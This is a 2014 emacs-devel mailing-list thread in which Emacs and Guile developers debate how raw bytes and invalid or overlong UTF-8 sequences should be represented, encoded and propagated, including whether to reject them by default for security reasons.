* Re: Emacs Lisp's future 2014-10-06 16:47 ` Eli Zaretskii @ 2014-10-06 17:31 ` David Kastrup 2014-10-06 17:58 ` David Kastrup 2014-10-06 17:43 ` Stephen J. Turnbull ` (2 subsequent siblings) 3 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-06 17:31 UTC (permalink / raw) To: Eli Zaretskii Cc: rms, Mark H Weaver, dmantipov, emacs-devel, handa, monnier, stephen Eli Zaretskii <eliz@gnu.org> writes: > Btw, Emacs doesn't expose the internal representation of these bytes > easily to Lisp programs. That is, whenever any program tries to > access the character at that position, it gets the original raw byte > that was there before the string was read from outside. A Lisp > program needs some very tricky and deliberate techniques to access the > internal representation of such bytes. (It isn't "overlong", btw, we > just represent the 128 bytes as codepoints in the 0x3fffXX range, and > encode it in UTF-8 with 5 bytes.) Oh. Didn't we use 3byte surrogate words (also not valid Unicode but encodable as 3 bytes) here? -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 17:31 ` David Kastrup @ 2014-10-06 17:58 ` David Kastrup 2014-10-07 2:35 ` Eli Zaretskii 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-06 17:58 UTC (permalink / raw) To: emacs-devel David Kastrup <dak@gnu.org> writes: > Eli Zaretskii <eliz@gnu.org> writes: > >> Btw, Emacs doesn't expose the internal representation of these bytes >> easily to Lisp programs. That is, whenever any program tries to >> access the character at that position, it gets the original raw byte >> that was there before the string was read from outside. A Lisp >> program needs some very tricky and deliberate techniques to access the >> internal representation of such bytes. (It isn't "overlong", btw, we >> just represent the 128 bytes as codepoints in the 0x3fffXX range, and >> encode it in UTF-8 with 5 bytes.) > > Oh. Didn't we use 3byte surrogate words (also not valid Unicode but > encodable as 3 bytes) here? Actually, one could even use overlong encodings of 0--127 (to represent raw bytes 128--255) and use only two bytes that way, but that's really asking for reencoding trouble. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 17:58 ` David Kastrup @ 2014-10-07 2:35 ` Eli Zaretskii 0 siblings, 0 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-10-07 2:35 UTC (permalink / raw) To: David Kastrup; +Cc: emacs-devel > From: David Kastrup <dak@gnu.org> > Date: Mon, 06 Oct 2014 19:58:08 +0200 > > David Kastrup <dak@gnu.org> writes: > > > Eli Zaretskii <eliz@gnu.org> writes: > > > >> Btw, Emacs doesn't expose the internal representation of these bytes > >> easily to Lisp programs. That is, whenever any program tries to > >> access the character at that position, it gets the original raw byte > >> that was there before the string was read from outside. A Lisp > >> program needs some very tricky and deliberate techniques to access the > >> internal representation of such bytes. (It isn't "overlong", btw, we > >> just represent the 128 bytes as codepoints in the 0x3fffXX range, and > >> encode it in UTF-8 with 5 bytes.) > > > > Oh. Didn't we use 3byte surrogate words (also not valid Unicode but > > encodable as 3 bytes) here? > > Actually, one could even use overlong encodings of 0--127 (to represent > raw bytes 128--255) and use only two bytes that way, but that's really > asking for reencoding trouble. As a matter of fact, we use a 2-byte representation for them. What I wrote above about 5 bytes is incorrect, sorry. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 16:47 ` Eli Zaretskii 2014-10-06 17:31 ` David Kastrup @ 2014-10-06 17:43 ` Stephen J. Turnbull 2014-10-06 17:53 ` David Kastrup 2014-10-07 14:03 ` Richard Stallman 2014-10-06 18:04 ` Stefan Monnier 2014-10-07 14:04 ` Richard Stallman 3 siblings, 2 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-06 17:43 UTC (permalink / raw) To: Eli Zaretskii Cc: dak, rms, Mark H Weaver, dmantipov, emacs-devel, handa, monnier Eli Zaretskii writes: > > From: Mark H Weaver <mhw@netris.org> > > It doesn't matter how these raw bytes are encoded internally. No > > matter what mechanism we use to accomplish it, propagating > > invalid byte sequences by default is bad security policy. > > How can we be responsible for byte streams that originated outside? By taking responsibility for them. ;-) > That's the responsibility of the source. And if there is a consumer, > then it is their responsibility not to trip upon such bytes. Not in a security context. In a security context, you want defense in depth: all separately developed components cooperate in covering up each others' bugs by handling input carefully and refusing to transmit broken output unless that is explicitly requested by the consumer (and you trust it to know what it's doing when it says, "don't worry, I can handle anything"!) > But how can you refuse to copy such bytes when you are just a pipe > that is expected not to change anything it wasn't toild to? By signaling an error and terminating. That's what a conformant Unicode process does. Note that the standard doesn't say you have to throw away state and give up entirely. It just says that if you do try to continue, you're not conforming any more. > > The Unicode standard requires that all UTF-8 codecs refuse to > > accept, produce, or propagate invalid byte sequences, including > > the troublesome overlong encodings. Again, what the Unicode standard says is that a codec that does any of those things may not call itself conformant. It doesn't say anything about nonconformant codecs -- which include all non-Unicode codecs, of course. So we already know that Emacs is going to be nonconformant in some use cases. However, it should be aware of the fact when it is not conforming to applicable standards. > So just passing a string unaltered through a Guile program would > change that string? If it is a stream of bytes which is alleged to conform to some standard but in fact does not, a program should (in general IMO, and by the Unicode standard if it claims Unicode conformance) signal an error and stop. If the program wishes to pick up where it left off in nonconformant mode and continue processing, that's fine (but it isn't conformant any more). In other words, "correcting" the string would be a nonconformant behavior. But this must be an explicit decision by the program (and it mustn't do that if the user wants conformance). Mark is absolutely correct that the Guile system should not default to non-conformance, and I don't think Emacs based on Guile should either, but that's up to the Emacs community to decide, of course. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 17:43 ` Stephen J. Turnbull @ 2014-10-06 17:53 ` David Kastrup 2014-10-07 0:35 ` Stephen J. Turnbull 2014-10-07 14:03 ` Richard Stallman 1 sibling, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-06 17:53 UTC (permalink / raw) To: Stephen J. Turnbull Cc: rms, Mark H Weaver, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii "Stephen J. Turnbull" <stephen@xemacs.org> writes: > Eli Zaretskii writes: > > > From: Mark H Weaver <mhw@netris.org> > > > > It doesn't matter how these raw bytes are encoded internally. No > > > matter what mechanism we use to accomplish it, propagating > > > invalid byte sequences by default is bad security policy. > > > > How can we be responsible for byte streams that originated outside? > > By taking responsibility for them. ;-) > > > That's the responsibility of the source. And if there is a consumer, > > then it is their responsibility not to trip upon such bytes. > > Not in a security context. In a security context, you want defense in > depth: all separately developed components cooperate in covering up > each others' bugs by handling input carefully and refusing to transmit > broken output unless that is explicitly requested by the consumer (and > you trust it to know what it's doing when it says, "don't worry, I can > handle anything"!) In a security relevant context, you would just not reencode before passing the information back to the outside. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 17:53 ` David Kastrup @ 2014-10-07 0:35 ` Stephen J. Turnbull 0 siblings, 0 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-07 0:35 UTC (permalink / raw) To: David Kastrup Cc: rms, Mark H Weaver, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii David Kastrup writes: > In a security relevant context, you would just not reencode before > passing the information back to the outside. That is ill-defined and almost surely not conforming to the process's documentation, and therefore would not be acceptable in a security context. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 17:43 ` Stephen J. Turnbull 2014-10-06 17:53 ` David Kastrup @ 2014-10-07 14:03 ` Richard Stallman 2014-10-07 14:21 ` David Kastrup 1 sibling, 1 reply; 404+ messages in thread From: Richard Stallman @ 2014-10-07 14:03 UTC (permalink / raw) To: Stephen J. Turnbull Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] In the GNU Project, we do not "obey" standards. Rather, we take them into account when judging what is best for the program to do. Emacs could conceivably report an error after decoding a file as UTF-8 which turns out to have invalid text. That way, the user will have the chance to decide whether to accept the decoding or not. If the user accepts it, the buffer should represent everything that is in the file. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 14:03 ` Richard Stallman @ 2014-10-07 14:21 ` David Kastrup 2014-10-07 15:16 ` Andreas Schwab 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-07 14:21 UTC (permalink / raw) To: emacs-devel Richard Stallman <rms@gnu.org> writes: > [[[ To any NSA and FBI agents reading my email: please consider ]]] > [[[ whether defending the US Constitution against all enemies, ]]] > [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > > In the GNU Project, we do not "obey" standards. Rather, we take them > into account when judging what is best for the program to do. > > Emacs could conceivably report an error after decoding a file as UTF-8 > which turns out to have invalid text. That way, the user will have > the chance to decide whether to accept the decoding or not. One problem with that is that quite often Emacs' choice of a coding system for a buffer is the result of heuristics rather than dependable information. Not making a fuzz might often be simplest. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 14:21 ` David Kastrup @ 2014-10-07 15:16 ` Andreas Schwab 2014-10-07 15:33 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Andreas Schwab @ 2014-10-07 15:16 UTC (permalink / raw) To: David Kastrup; +Cc: emacs-devel David Kastrup <dak@gnu.org> writes: > One problem with that is that quite often Emacs' choice of a coding > system for a buffer is the result of heuristics rather than dependable > information. Not making a fuzz might often be simplest. If you try to save a buffer Emacs will check whether all characters are encodable, and complain (and ask) if they aren't. Andreas. -- Andreas Schwab, SUSE Labs, schwab@suse.de GPG Key fingerprint = 0196 BAD8 1CE9 1970 F4BE 1748 E4D4 88E3 0EEA B9D7 "And now for something completely different." ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 15:16 ` Andreas Schwab @ 2014-10-07 15:33 ` David Kastrup 2014-10-07 15:42 ` Andreas Schwab 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-07 15:33 UTC (permalink / raw) To: emacs-devel Andreas Schwab <schwab@suse.de> writes: > David Kastrup <dak@gnu.org> writes: > >> One problem with that is that quite often Emacs' choice of a coding >> system for a buffer is the result of heuristics rather than dependable >> information. Not making a fuzz might often be simplest. > > If you try to save a buffer Emacs will check whether all characters are > encodable, and complain (and ask) if they aren't. Sure, but a raw byte is trivially encodable since it is no character. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 15:33 ` David Kastrup @ 2014-10-07 15:42 ` Andreas Schwab 2014-10-07 16:03 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Andreas Schwab @ 2014-10-07 15:42 UTC (permalink / raw) To: David Kastrup; +Cc: emacs-devel David Kastrup <dak@gnu.org> writes: > Andreas Schwab <schwab@suse.de> writes: > >> David Kastrup <dak@gnu.org> writes: >> >>> One problem with that is that quite often Emacs' choice of a coding >>> system for a buffer is the result of heuristics rather than dependable >>> information. Not making a fuzz might often be simplest. >> >> If you try to save a buffer Emacs will check whether all characters are >> encodable, and complain (and ask) if they aren't. > > Sure, but a raw byte is trivially encodable since it is no character. This is a contradiction. It isn't a character, so it isn't encodable. Andreas. -- Andreas Schwab, SUSE Labs, schwab@suse.de GPG Key fingerprint = 0196 BAD8 1CE9 1970 F4BE 1748 E4D4 88E3 0EEA B9D7 "And now for something completely different." ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 15:42 ` Andreas Schwab @ 2014-10-07 16:03 ` David Kastrup 2014-10-07 16:16 ` Andreas Schwab 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-07 16:03 UTC (permalink / raw) To: Andreas Schwab; +Cc: emacs-devel Andreas Schwab <schwab@suse.de> writes: > David Kastrup <dak@gnu.org> writes: > >> Andreas Schwab <schwab@suse.de> writes: >> >>> David Kastrup <dak@gnu.org> writes: >>> >>>> One problem with that is that quite often Emacs' choice of a coding >>>> system for a buffer is the result of heuristics rather than dependable >>>> information. Not making a fuzz might often be simplest. >>> >>> If you try to save a buffer Emacs will check whether all characters are >>> encodable, and complain (and ask) if they aren't. >> >> Sure, but a raw byte is trivially encodable since it is no character. > > This is a contradiction. It isn't a character, so it isn't encodable. The character representation of "raw byte" is trivially encodable since it represents a single byte in any encoding. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 16:03 ` David Kastrup @ 2014-10-07 16:16 ` Andreas Schwab 2014-10-07 16:24 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Andreas Schwab @ 2014-10-07 16:16 UTC (permalink / raw) To: David Kastrup; +Cc: emacs-devel David Kastrup <dak@gnu.org> writes: > Andreas Schwab <schwab@suse.de> writes: > >> David Kastrup <dak@gnu.org> writes: >> >>> Andreas Schwab <schwab@suse.de> writes: >>> >>>> David Kastrup <dak@gnu.org> writes: >>>> >>>>> One problem with that is that quite often Emacs' choice of a coding >>>>> system for a buffer is the result of heuristics rather than dependable >>>>> information. Not making a fuzz might often be simplest. >>>> >>>> If you try to save a buffer Emacs will check whether all characters are >>>> encodable, and complain (and ask) if they aren't. >>> >>> Sure, but a raw byte is trivially encodable since it is no character. >> >> This is a contradiction. It isn't a character, so it isn't encodable. > > The character representation of "raw byte" is trivially encodable since > it represents a single byte in any encoding. No encoding (except raw-text) can encode characters from the eight-bit charset. Andreas. -- Andreas Schwab, SUSE Labs, schwab@suse.de GPG Key fingerprint = 0196 BAD8 1CE9 1970 F4BE 1748 E4D4 88E3 0EEA B9D7 "And now for something completely different." ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 16:16 ` Andreas Schwab @ 2014-10-07 16:24 ` David Kastrup 2014-10-07 16:31 ` Andreas Schwab 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-07 16:24 UTC (permalink / raw) To: Andreas Schwab; +Cc: emacs-devel Andreas Schwab <schwab@suse.de> writes: > David Kastrup <dak@gnu.org> writes: > >> Andreas Schwab <schwab@suse.de> writes: >> >>> David Kastrup <dak@gnu.org> writes: >>> >>>> Andreas Schwab <schwab@suse.de> writes: >>>> >>>>> David Kastrup <dak@gnu.org> writes: >>>>> >>>>>> One problem with that is that quite often Emacs' choice of a coding >>>>>> system for a buffer is the result of heuristics rather than dependable >>>>>> information. Not making a fuzz might often be simplest. >>>>> >>>>> If you try to save a buffer Emacs will check whether all characters are >>>>> encodable, and complain (and ask) if they aren't. >>>> >>>> Sure, but a raw byte is trivially encodable since it is no character. >>> >>> This is a contradiction. It isn't a character, so it isn't encodable. >> >> The character representation of "raw byte" is trivially encodable since >> it represents a single byte in any encoding. > > No encoding (except raw-text) can encode characters from the eight-bit > charset. (encode-coding-string (string (decode-char 'eight-bit 128)) 'utf-8) => "\200" -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 16:24 ` David Kastrup @ 2014-10-07 16:31 ` Andreas Schwab 2014-10-07 16:52 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Andreas Schwab @ 2014-10-07 16:31 UTC (permalink / raw) To: David Kastrup; +Cc: emacs-devel David Kastrup <dak@gnu.org> writes: > Andreas Schwab <schwab@suse.de> writes: > >> David Kastrup <dak@gnu.org> writes: >> >>> Andreas Schwab <schwab@suse.de> writes: >>> >>>> David Kastrup <dak@gnu.org> writes: >>>> >>>>> Andreas Schwab <schwab@suse.de> writes: >>>>> >>>>>> David Kastrup <dak@gnu.org> writes: >>>>>> >>>>>>> One problem with that is that quite often Emacs' choice of a coding >>>>>>> system for a buffer is the result of heuristics rather than dependable >>>>>>> information. Not making a fuzz might often be simplest. >>>>>> >>>>>> If you try to save a buffer Emacs will check whether all characters are >>>>>> encodable, and complain (and ask) if they aren't. >>>>> >>>>> Sure, but a raw byte is trivially encodable since it is no character. >>>> >>>> This is a contradiction. It isn't a character, so it isn't encodable. >>> >>> The character representation of "raw byte" is trivially encodable since >>> it represents a single byte in any encoding. >> >> No encoding (except raw-text) can encode characters from the eight-bit >> charset. > > (encode-coding-string (string (decode-char 'eight-bit 128)) 'utf-8) > => "\200" That's what you get if you *force* the coding system. But Emacs will still complain and ask if you try to save such a buffer. Andreas. -- Andreas Schwab, SUSE Labs, schwab@suse.de GPG Key fingerprint = 0196 BAD8 1CE9 1970 F4BE 1748 E4D4 88E3 0EEA B9D7 "And now for something completely different." ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 16:31 ` Andreas Schwab @ 2014-10-07 16:52 ` David Kastrup 2014-10-07 17:38 ` Andreas Schwab 2014-10-08 0:47 ` Richard Stallman 0 siblings, 2 replies; 404+ messages in thread From: David Kastrup @ 2014-10-07 16:52 UTC (permalink / raw) To: Andreas Schwab; +Cc: emacs-devel Andreas Schwab <schwab@suse.de> writes: > David Kastrup <dak@gnu.org> writes: > >> Andreas Schwab <schwab@suse.de> writes: >> >>> David Kastrup <dak@gnu.org> writes: >>> >>>> Andreas Schwab <schwab@suse.de> writes: >>>> >>>>> David Kastrup <dak@gnu.org> writes: >>>>> >>>>>> Andreas Schwab <schwab@suse.de> writes: >>>>>> >>>>>>> David Kastrup <dak@gnu.org> writes: >>>>>>> >>>>>>>> One problem with that is that quite often Emacs' choice of a coding >>>>>>>> system for a buffer is the result of heuristics rather than dependable >>>>>>>> information. Not making a fuzz might often be simplest. >>>>>>> >>>>>>> If you try to save a buffer Emacs will check whether all characters are >>>>>>> encodable, and complain (and ask) if they aren't. >>>>>> >>>>>> Sure, but a raw byte is trivially encodable since it is no character. >>>>> >>>>> This is a contradiction. It isn't a character, so it isn't encodable. >>>> >>>> The character representation of "raw byte" is trivially encodable since >>>> it represents a single byte in any encoding. >>> >>> No encoding (except raw-text) can encode characters from the eight-bit >>> charset. >> >> (encode-coding-string (string (decode-char 'eight-bit 128)) 'utf-8) >> => "\200" > > That's what you get if you *force* the coding system. It would appear that you are forcing your logic. "No encoding can ..." does not mean that. > But Emacs will still complain and ask if you try to save such a > buffer. (let ((coding-system-for-write 'utf-8-unix)) (with-temp-file "/tmp/bozo" (insert(encode-coding-string (string (decode-char 'eight-bit 128)) 'utf-8)))) od /tmp/bozo 0000000 000200 0000001 What you mean is that Emacs is asked to _select_ or to _verify_ a coding system (as is customary for interactive editing of a file) it will do so and get back to the user when necessary. But that is _quite_ different from Emacs being _incapable_ of encoding raw bytes to a file or a stream of a specified encoding. It means that when you are using an _application_ that is expected to deliver only decodable characters, then the _application_ will _ask_ before going ahead. But the _engine_ is perfectly capable of going through here. Once you confuse engine and application and state "Emacs should not be able to encode characters from the eight-bit set" rather than "the normal file saving operation defaulting to using buffer-file-coding-system for coding-system-for-write after verifying its suitability should ask before picking a value of coding-system-for-write that cause a file to be written that is not representable without raw bytes" you are proposing to cripple Emacs. Or GUILE. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 16:52 ` David Kastrup @ 2014-10-07 17:38 ` Andreas Schwab 2014-10-08 0:47 ` Richard Stallman 1 sibling, 0 replies; 404+ messages in thread From: Andreas Schwab @ 2014-10-07 17:38 UTC (permalink / raw) To: David Kastrup; +Cc: emacs-devel David Kastrup <dak@gnu.org> writes: > Andreas Schwab <schwab@suse.de> writes: > >> David Kastrup <dak@gnu.org> writes: >> >>> Andreas Schwab <schwab@suse.de> writes: >>> >>>> David Kastrup <dak@gnu.org> writes: >>>> >>>>> Andreas Schwab <schwab@suse.de> writes: >>>>> >>>>>> David Kastrup <dak@gnu.org> writes: >>>>>> >>>>>>> Andreas Schwab <schwab@suse.de> writes: >>>>>>> >>>>>>>> David Kastrup <dak@gnu.org> writes: >>>>>>>> >>>>>>>>> One problem with that is that quite often Emacs' choice of a coding >>>>>>>>> system for a buffer is the result of heuristics rather than dependable >>>>>>>>> information. Not making a fuzz might often be simplest. >>>>>>>> >>>>>>>> If you try to save a buffer Emacs will check whether all characters are >>>>>>>> encodable, and complain (and ask) if they aren't. >>>>>>> >>>>>>> Sure, but a raw byte is trivially encodable since it is no character. >>>>>> >>>>>> This is a contradiction. It isn't a character, so it isn't encodable. >>>>> >>>>> The character representation of "raw byte" is trivially encodable since >>>>> it represents a single byte in any encoding. >>>> >>>> No encoding (except raw-text) can encode characters from the eight-bit >>>> charset. >>> >>> (encode-coding-string (string (decode-char 'eight-bit 128)) 'utf-8) >>> => "\200" >> >> That's what you get if you *force* the coding system. > > It would appear that you are forcing your logic. "No encoding can ..." > does not mean that. That's what Emacs told me, with the heuristics you are talking about. Andreas. -- Andreas Schwab, schwab@linux-m68k.org GPG Key fingerprint = 58CA 54C7 6D53 942B 1756 01D3 44D5 214B 8276 4ED5 "And now for something completely different." ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 16:52 ` David Kastrup 2014-10-07 17:38 ` Andreas Schwab @ 2014-10-08 0:47 ` Richard Stallman 2014-10-08 7:19 ` Eli Zaretskii 1 sibling, 1 reply; 404+ messages in thread From: Richard Stallman @ 2014-10-08 0:47 UTC (permalink / raw) To: David Kastrup; +Cc: schwab, emacs-devel [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] What you mean is that Emacs is asked to _select_ or to _verify_ a coding system (as is customary for interactive editing of a file) it will do so and get back to the user when necessary. But that is _quite_ different from Emacs being _incapable_ of encoding raw bytes to a file or a stream of a specified encoding. It means that when you are using an _application_ that is expected to deliver only decodable characters, then the _application_ will _ask_ before going ahead. But the _engine_ is perfectly capable of going through here. I think that both of these are points correct. But there is still the question of what the engine should do by default. We can set the defaults for those non-frile interfaces so as to reject invalid UTF-8 sequences. Then a program could specify to override the default and allow them. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-08 0:47 ` Richard Stallman @ 2014-10-08 7:19 ` Eli Zaretskii 2014-10-08 7:37 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Eli Zaretskii @ 2014-10-08 7:19 UTC (permalink / raw) To: rms; +Cc: schwab, dak, emacs-devel > Date: Tue, 07 Oct 2014 20:47:46 -0400 > From: Richard Stallman <rms@gnu.org> > Cc: schwab@suse.de, emacs-devel@gnu.org > > We can set the defaults for those non-frile interfaces so as to reject > invalid UTF-8 sequences. Then a program could specify to override the > default and allow them. That has been tried (not with UTF-8, but I don't think this matters), and failed miserably. The experience taught us that Emacs users definitely don't want Emacs to do _anything_ about the unmodified parts of text, except copy it verbatim. Even the question we ask at buffer-save time is sometimes reported as an annoyance. Let's not repeat those mistakes. The current design principle is that the application or the user need to specifically ask for strict conformance, if they want it. For example, if someone was designing a secure application on top of Emacs, they would need to opt-in such behavior. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-08 7:19 ` Eli Zaretskii @ 2014-10-08 7:37 ` David Kastrup 0 siblings, 0 replies; 404+ messages in thread From: David Kastrup @ 2014-10-08 7:37 UTC (permalink / raw) To: Eli Zaretskii; +Cc: schwab, rms, emacs-devel Eli Zaretskii <eliz@gnu.org> writes: >> Date: Tue, 07 Oct 2014 20:47:46 -0400 >> From: Richard Stallman <rms@gnu.org> >> Cc: schwab@suse.de, emacs-devel@gnu.org >> >> We can set the defaults for those non-frile interfaces so as to reject >> invalid UTF-8 sequences. Then a program could specify to override the >> default and allow them. > > That has been tried (not with UTF-8, but I don't think this matters), > and failed miserably. The experience taught us that Emacs users > definitely don't want Emacs to do _anything_ about the unmodified > parts of text, except copy it verbatim. Even the question we ask at > buffer-save time is sometimes reported as an annoyance. As one data point, PostScript and PDF files generally constitute of plain readable text (I seem to remember latin-1 with an option to use some BOM in strings for getting UTF16 locally but I may be mistaken) but with inserted binary objects. At least with PostScript, the file is linear and one can edit in changes if one wants to. Obviously, any unintentional changes in the binary sections are going to stop the result from working. This is definitely a case where you want to have better editing capabilities than a hexdump would give you (as you cannot insert or delete strings comfortably in a hexdump), but you still want the binary portions to remain undisturbed as a block. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 16:47 ` Eli Zaretskii 2014-10-06 17:31 ` David Kastrup 2014-10-06 17:43 ` Stephen J. Turnbull @ 2014-10-06 18:04 ` Stefan Monnier 2014-10-06 23:00 ` Mark H Weaver 2014-10-07 14:03 ` Richard Stallman 2014-10-07 14:04 ` Richard Stallman 3 siblings, 2 replies; 404+ messages in thread From: Stefan Monnier @ 2014-10-06 18:04 UTC (permalink / raw) To: Eli Zaretskii Cc: dak, rms, Mark H Weaver, dmantipov, emacs-devel, handa, stephen Please, could you move this discussion elsewhere. While I understand the Guile developers might want to try and reuse either Emacs's code or at least its design and expertise, this discussion is about Guile, not about Emacs, so please move it to a Guile mailing-list. Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 18:04 ` Stefan Monnier @ 2014-10-06 23:00 ` Mark H Weaver 2014-10-07 1:04 ` Stefan Monnier 2014-10-07 14:03 ` Richard Stallman 1 sibling, 1 reply; 404+ messages in thread From: Mark H Weaver @ 2014-10-06 23:00 UTC (permalink / raw) To: Stefan Monnier Cc: dak, rms, dmantipov, emacs-devel, handa, Eli Zaretskii, stephen Stefan Monnier <monnier@iro.umontreal.ca> writes: > Please, could you move this discussion elsewhere. While I understand > the Guile developers might want to try and reuse either Emacs's code > or at least its design and expertise, this discussion is about Guile, > not about Emacs, I think this is false. This discussion, initiated by Richard, is about how Guile can adapt itself to better meet the needs of Emacs. If the discussion happens where very few Emacs users/developers are present, then I don't see how it can be useful. Mark ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 23:00 ` Mark H Weaver @ 2014-10-07 1:04 ` Stefan Monnier 0 siblings, 0 replies; 404+ messages in thread From: Stefan Monnier @ 2014-10-07 1:04 UTC (permalink / raw) To: Mark H Weaver Cc: dak, rms, dmantipov, emacs-devel, handa, Eli Zaretskii, stephen > I think this is false. This discussion, initiated by Richard, is about > how Guile can adapt itself to better meet the needs of Emacs. If the > discussion happens where very few Emacs users/developers are present, > then I don't see how it can be useful. I understand you want Emacs developers to participate. But I don't want Emacs's mailing list to be drowned any more than it already is. Stefan PS: Also I don't see why this discussion is useful at all. It's just people arguing about opinions, which I can't imagine you need any more of. If you need to know how Emacs works, just ask us. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 18:04 ` Stefan Monnier 2014-10-06 23:00 ` Mark H Weaver @ 2014-10-07 14:03 ` Richard Stallman 1 sibling, 0 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-07 14:03 UTC (permalink / raw) To: Stefan Monnier; +Cc: dak, mhw, dmantipov, emacs-devel, handa, eliz, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] This discussion is about making Guile and Emacs work together. I can't think of any other list that would be as good. If this were an ongoing thing, perhaps we should make a new list, but I don't think it will be needed. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 16:47 ` Eli Zaretskii ` (2 preceding siblings ...) 2014-10-06 18:04 ` Stefan Monnier @ 2014-10-07 14:04 ` Richard Stallman 2014-10-07 14:14 ` David Kastrup 2014-10-07 14:21 ` Andreas Schwab 3 siblings, 2 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-07 14:04 UTC (permalink / raw) To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] For >> example, the ASCII quote (") can be represented as the single byte 0x22, >> the two byte sequence 0xC0 0xA2, etc. What does Emacs do now with a file that contains these "overlong" sequences? -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
